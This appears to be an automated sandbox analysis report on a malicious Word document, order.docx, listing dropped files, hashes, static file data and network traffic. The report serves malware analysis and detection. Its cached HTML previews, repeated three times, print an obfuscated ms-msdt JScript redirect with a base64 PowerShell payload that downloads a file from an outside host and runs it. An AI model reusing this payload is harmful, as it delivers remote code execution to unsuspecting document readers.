C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BDA067BC-A85F-4D09-B1E2-A27A26259E72}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6680333186685128
Encrypted:	false
SSDEEP:	96:KxaCyc4zzRrdrhr1elVrf7oGzx54HU0HU5LLs1BQM8rDdTM8rDk9rrFF9rrF:jc45Np1eXMGzDU78LsHQ7tT7sFHF
MD5:	0F9367D91948664C4F0693A5B2D1F022
SHA1:	87640D1AE4FF977D2262FB54BFC5B84DB76EDFB2
SHA-256:	F5B4FDE36B3E368EE7C6E745D715BE2658F830B88C6F411D82C3E16B0BC713B6
SHA-512:	FEB40E2A419901F30C4FB9EBDEF7713D947AE18421D5B97270DF5B067F42D0D3EAEFFEE6620DB83B5BADA053367C5960F767E71A021140A47723607FCF440318
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z./Hx...O.R..@...S,...X.F...Fa.q.............................#.JA..@....K.L...............G....#..2.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9684196678119985
Encrypted:	false
SSDEEP:	3:yVlgsRlzolVJIyrnWWDhPN3IlkNlZZglc9NCR5l276:yPblzolUW1T4+wlc9ot22
MD5:	B3F9E95F032199D9FFC42A0D17DB4430
SHA1:	3B883B7D1150D9832CBC819C1852D96B2FD6FF21
SHA-256:	9A45C47B86B253B8AF932AF843250F11E722706F79CDDB7D103971C08E4F8C29
SHA-512:	773C82C9CB1E761B3051473129F93AC19DE9BD4E8C9F437176BEC12D308CF27A5E6260A6D47E5E3F2609C9BBC7A0B625D72EE29C781275A335CA996066F6B2A7
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.B.D.A.0.6.7.B.C.-.A.8.5.F.-.4.D.0.9.-.B.1.E.2.-.A.2.7.A.2.6.2.5.9.E.7.2.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.2879180121063263
Encrypted:	false
SSDEEP:	48:I3sRBLontTzybGrn7ndxYyK2cw/SgR5ErBQqeQqNH:KsLMnJzybyn7nrYy3DUBQ5Q+H
MD5:	12C0319349817D1200BD72928EFF5130
SHA1:	2659A8308AC1006515BFDF4D53B14C9F69F7E102
SHA-256:	9C3F839DC9BE9306C246846AFE3ADBBABB4A4D91210176C0B00AC7D7CBAB88D3
SHA-512:	D00FE147BB8D3089B1927875019FA13F5401C62FA82A33821E22AE94DDF8CB7273365748558184B0BF12FEFAC93D2B089BD9B14BDFE5C4CFAA33928D0FB26BE3
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.......E.....qi.S,...X.F...Fa.q.............................K.$..9N..5.S..\|............h..G..vRq*...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{87FAB0B5-CE0C-4484-80A4-0721760F3A7E}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22123534710596615
Encrypted:	false
SSDEEP:	48:I3fZUrBKp51f1h0gL1U0/k1t81Z1tubFpZ+18Z+11:KfZCKp51f1z1jk1W1Z1t0o18o11
MD5:	05B01089293DF5BB27FED11ECA430E6F
SHA1:	92D1D51F3A1262A740E2239D66759BD14F5583DB
SHA-256:	8DFBEF5045064D09CC51B199192171E1B147A5404F9EA799B4260F960E56AAC7
SHA-512:	48EE074EA044A608B5BEF00AF6B72A5865E58F133C16C3FFCEB35D568B7332F49052689340204F119666B15B17F0DB3C4794C3C026CA13F5E1955F13B78B1677
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zxM.I.70E....Ua.ZS,...X.F...Fa.q.............................{.....A..N...s..............J........P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9574976283572916
Encrypted:	false
SSDEEP:	3:yVlgsRlz4jlG9KSlhmSLlYnPkRIlPSNr7ljtlWglIRZ276:yPblzqhSaS6nPkRIdSPpYglIf22
MD5:	47E62973D3D4A696C9CB8D121EC7DDAA
SHA1:	43F1A500741C399A6ADC55BC1013BB0F917F2F20
SHA-256:	209521C1D97FEA95A89C0C09038668F492955E29CDB45180C891D78B86782AB9
SHA-512:	DA70307E906E96DFD37DAF5201FB02B6F9CAFE8D4E9455B4FF98DE61E43861C0CB244578AA768ED238DA95CEDBD8A1FEC016F8AD8F4FA2018B20602BD9E435F4
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.8.7.F.A.B.0.B.5.-.C.E.0.C.-.4.4.8.4.-.8.0.A.4.-.0.7.2.1.7.6.0.F.3.A.7.E.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\test[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12744
Entropy (8bit):	6.075581200829705
Encrypted:	false
SSDEEP:	192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
MD5:	2E15CCD20E7E02ED1F80CB3557FA4E89
SHA1:	B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
SHA-256:	78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
SHA-512:	FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
Malicious:	false
Reputation:	low
IE Cache URL:	http://polpharmar.com/test.html
Preview:	<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14683F8F.jpg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2453x3509, frames 3
Category:	dropped
Size (bytes):	428988
Entropy (8bit):	7.450719655008162
Encrypted:	false
SSDEEP:	12288:hMx4+OsFSHQoWeN/aj0k6GgqPbTwlc08ZJ:hMmWeN/XegqPb7J
MD5:	E8C7DD6A2DED0B1A7C8F5C15FE284802
SHA1:	B93D9DC1405EE585DEC160FD0B0E7F2AF0D269A0
SHA-256:	82C2564BFE32D9FCA3B4919AD2FAA4AD8DFCBEC0DD7A1C50C7B1228DD6FF2AB4
SHA-512:	6100C0A1C357E6B05AFE3367B9CA5425C2FE81393E35B1297F9D7AFC5F1F07832B9CD0C26E9142A3BEE6086C6201BE2F2F4345A09044A8DBA49EEAF91B882FEF
Malicious:	false
Reputation:	low
Preview:	......JFIF.....,.,.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51B846.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12744
Entropy (8bit):	6.075581200829705
Encrypted:	false
SSDEEP:	192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
MD5:	2E15CCD20E7E02ED1F80CB3557FA4E89
SHA1:	B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
SHA-256:	78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
SHA-512:	FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
Malicious:	false
Reputation:	low
Preview:	<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B00ABF75.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12744
Entropy (8bit):	6.075581200829705
Encrypted:	false
SSDEEP:	192:NUUW7GUpDmLryJoAf719cD6wIFfRIbTO96KEbHGQ78/7GyUxV4eDQnHGD:NECQ4yJPDcD6c2NE3G7GyUxV33D
MD5:	2E15CCD20E7E02ED1F80CB3557FA4E89
SHA1:	B7C97A67705C420A5246E9C9BB39720B4E1B5FC0
SHA-256:	78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
SHA-512:	FD2B42562A8188ACE73FD25E8752B8A394E2FDD901834826588ABF062B3D5A28AFE57CB41B467A2814B4D95E1308200BED2714F56E69A2D919060B2B4A540A81
Malicious:	false
Reputation:	low
Preview:	<!dOcTypE HTml>....<HTmL>....<boDY>....<SCrIpT typE="text/JScript">........location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0L

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	1.9630438652210782
Encrypted:	false
SSDEEP:	12:rl3bn+HFADYWtaoa5sQ2p0hCXhlSRmCRncKvjMKvqrCJo0nKvqFn7i1X4CIX4X4h:rbR6Op0rRjRcSgSTSWio4VR
MD5:	D164864528BA69AE924554E4638BA1A6
SHA1:	7257FD1CC0A67FCEBAB6E078533460C45AAF3BBA
SHA-256:	36072BAE47AEB89D82C4E9AEAC305591853FB3B5FB5F328B41429E1AD583743E
SHA-512:	A204231FB6CAC172B2B3CBBAA2D27245B150300D601E948A4A556A560C6FBC2B00295EED81CA8F443285ABFDA149BD780FDA65E80B4DD6EAB2F82D8B38740728
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	dBase III DBT, version number 0, next free block index 5177357
Category:	dropped
Size (bytes):	2888
Entropy (8bit):	2.4712779761264723
Encrypted:	false
SSDEEP:	24:yFChNWhYG5laEUSsSkS90J+RTskGsAwMKinefAtHDlMsGf2KvBS4OxM:yEXWhh7CSsSkF7kPn/inOA7PJIg4O2
MD5:	FE62A27FE716EDD8CA556BD4BD4936B3
SHA1:	F16D68DCF3F5B66BC8632362A5582EC266403AA6
SHA-256:	50EF0BFE8FAD94DF14E78769F0DD6259B960DB21348B6BBD5B5A66D94B8968DE
SHA-512:	55BA43A5A2811C5A421BCC154B4687D9D002B8F6D86357DB26C9725928F032B9742B52910F292FFFCDFC56FF9862497BF7BB26B19CE7613EC22BE6FFB298FFDA
Malicious:	false
Preview:	..O.O. .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................,.......>...p...............V...........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{502EA169-3BBF-4D41-A8CE-F39114DECA2E}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025534580459190742
Encrypted:	false
SSDEEP:	6:I3DPc0hV42J9vxggLRCg/gEQtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpH/glvYg3J/
MD5:	019F974878CAE2B3FC1E26BD4B84F84D
SHA1:	24025E2DDB9FB1A00CC767A59E5965DC7FDAB99A
SHA-256:	543C4D8F2C76D81913B99D569286D61D0FB1538EE499019BB6B8A3C1564F35D2
SHA-512:	670AAA166C8D0E5EA133CB9E850291D0F263D4DC0A07961A300EE561D10C970181D558D61BD6D35A85CC2ED451B464A5FB4170F02F1CE6D09B8BB4EFA38D98C9
Malicious:	false
Preview:	......M.eFy...z.......E.....qi.S,...X.F...Fa.q.............................."b4rN..2+.66Z............h..G..vRq*.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{F1216906-4709-45A5-B8F3-741536BBB63B}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02561327614152181
Encrypted:	false
SSDEEP:	6:I3DPcO7mRvxggLRtuGBTw2RXv//4tfnRujlw//+GtluJ/eRuj:I3DPNCQ40evYg3J/
MD5:	7C0D380D75B07C76F90A64BC0C0BB4C4
SHA1:	97263771B651F3607BA16EE1091E4E0470D0D0A1
SHA-256:	637759E0BB88213E39C092E9150B36626FD34A2D81D3C11301EDA229B0EB6C75
SHA-512:	355EC0BFB45F9D4D1E46A179A1FF2C46327EBA12B69109D331B8818A8CC65D0532FE2AC70120C7C430AB0C350E96A645504F292907A427E247EFD345388E4A84
Malicious:	false
Preview:	......M.eFy...z...S.!.F.L.O...S,...X.F...Fa.q............................:.....aK..\\|`..Q........5..K.I.T.....i.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.385929384302707
Encrypted:	false
SSDEEP:	3:bDuMJlSmNrFomxWBGrFov:bCYN5yG5y
MD5:	6E65A4A82201A6E784741E067206F0FF
SHA1:	D87C02C96364F566BC9D1BD0731EEABCB675D396
SHA-256:	0DD74BE8D4947A9D214C3996F2B1DAA7489CAEF559D564888A14252FB6F62C9E
SHA-512:	85154A06C9B0B429EDD011B6D971135C08DBE1AC3873AF3E61992980EB8573338D704D89BDE19C9527822A435CFDFDEE151574794E8F3A9EC48C626BABDD05BD
Malicious:	false
Preview:	[folders]..Templates.LNK=0..order.LNK=0..[misc]..order.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Mon Aug 1 16:49:19 2022, length=327439, window=hide
Category:	dropped
Size (bytes):	992
Entropy (8bit):	4.5589914149078465
Encrypted:	false
SSDEEP:	12:8x94II0gXg/XAlCPCHaXMBzB/nPyX+WeNGY5i+VicvbcHfZpzNDtZ3YilMMEpxRN:8x9Ik/XT89dqwQZ3eQH5Dv3qIu7D
MD5:	52F509E11A66BB60D5E215CECE2B2DDA
SHA1:	2936E51CCCE4FA3D3B96AD0A73A3601D4E1448CF
SHA-256:	A0890DE7166F147DDC6289D55DA4E1C2E549CAF2BB94AF5EFC13C6E8BE0DAEAF
SHA-512:	2CE4423374F89F3EFC652AD8D0459F2E4511DD20010B85155DDF3190F5C63E8026F8ED50941590C99AB6B1CDFFFD7C0D071A08EE8108A8EF6293ADA7AE20F97F
Malicious:	false
Preview:	L..................F.... ....(h..3...(h..3...8~.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2......U. .ORDER~1.DOC.B......hT..hT..*...r.....'...............o.r.d.e.r...d.o.c.x.......t...............-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\order.docx.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..... .....[....

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$order.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.996855978259955
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	order.docx
File size:	327439
MD5:	8abea2d6c14af54c6eac09d158554085
SHA1:	3802d9c8b3530fe7b140cbd4a12c3895c46077b2
SHA256:	aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
SHA512:	81bc9de694da797127ae09ac5a8e1d630981482e60343d870d6f106752af3bb2a9330852be728c2293a29c890f5d21b31ba820712a052fbc847d0fc06473050d
SSDEEP:	6144:khRfXb0GPobJUS8LOtB2x4FSTiSwQOV9Wojlv1CkMb02AxNw+w1m:khRfYGP+JUFOt9einQOKq/Mb0o1m
TLSH:	586423C4AAACFCC9E7DC2589E87343F871492954527C9B33E00274AC4DA7292EE77B10
File Content Preview:	PK.........g.T..'.d...T.......[Content_Types].xmlUT...S\|.bS\|.bS\|.b...n.0.E......(1tQU..E.......=.n..m^..1..B)..l"%3....5..Z.l.>HkJ2(.$.........9.#Y.......l ....j8.8...M(.<FwOi.s.,....Je.f._}M.....z...RnM....<.h...[..=..s....${h...$.9%9.X.K#.(..P.r......6.

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2022 10:49:38.572686911 CEST	49171	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:38.621368885 CEST	80	49171	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:38.621476889 CEST	49171	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:38.621876955 CEST	49171	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:38.670455933 CEST	80	49171	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:38.674829960 CEST	80	49171	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:38.674990892 CEST	49171	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:43.679717064 CEST	80	49171	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:43.679815054 CEST	49171	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:44.537843943 CEST	49172	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:44.586576939 CEST	80	49172	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:44.586747885 CEST	49172	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:44.586869001 CEST	49172	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:44.635643005 CEST	80	49172	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:44.636255026 CEST	80	49172	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:44.846836090 CEST	49172	80	192.168.2.22	91.235.116.180
Aug 1, 2022 10:49:44.884654045 CEST	80	49172	91.235.116.180	192.168.2.22
Aug 1, 2022 10:49:44.884814978 CEST	49172	80	192.168.2.22	91.235.116.180
